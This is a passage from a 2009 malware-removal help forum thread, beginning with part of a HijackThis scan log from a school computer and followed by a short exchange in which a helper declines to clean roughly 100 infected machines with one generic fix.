O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-21-3925025582-4110435278-4136060888-1115\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User 'tme')
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - Global Startup: AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
O4 - Global Startup: SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupd...b?1207692023140
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = vview.edu
O17 - HKLM\Software\..\Telephony: DomainName = vview.edu
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = vview.edu
O20 - AppInit_DLLs: C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: dkab_device - Unknown owner - C:\WINDOWS\system32\DKabcoms.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Sophos Anti-Virus status reporter (SAVAdminService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
O23 - Service: Sophos Anti-Virus (SAVService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
O23 - Service: SMART Board Service - SMART Technologies Inc. - C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
O23 - Service: SMART Web Server - Unknown owner - C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe
O23 - Service: Sophos Agent - Sophos Plc - C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
O23 - Service: Sophos AutoUpdate Service - Sophos Plc - C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
O23 - Service: Sophos Device Control Service - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
O23 - Service: Sophos Message Router - Sophos Plc - C:\Program Files\Sophos\Remote Management System\RouterNT.exe
O23 - Service: User Agent Service (UAService) - Lightspeed Systems - C:\Program Files\Lightspeed Systems\User Agent\UAService.exe

--
End of file - 9121 bytes

#10 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 02 April 2009 - 03:19 PM

How many computers do you have?

Edited by farbar, 02 April 2009 - 03:19 PM.


#11 nightjar59

nightjar59
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:10:36 AM

Posted 02 April 2009 - 03:23 PM

That are infected about 100 or so. That I have here with me about 15.

#12 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 02 April 2009 - 03:31 PM

From your initial post:

I have seen in the Hijack this Forum that Farbar had uploaded a vjag.bat and I have the same problem on one of my Schools Teachers machine and would like to be able to have this file if possible. Thanks.


We are not going to clean them. Every of them needs a fix and there is no fix for all of them.

Edited by farbar, 02 April 2009 - 03:59 PM.


#13 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 03 April 2009 - 04:07 PM

Are you still there?

#14 nightjar59

nightjar59
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:10:36 AM

Posted 03 April 2009 - 04:25 PM

Yes I am.

#15 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 03 April 2009 - 04:28 PM

You did not reacted to my post.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users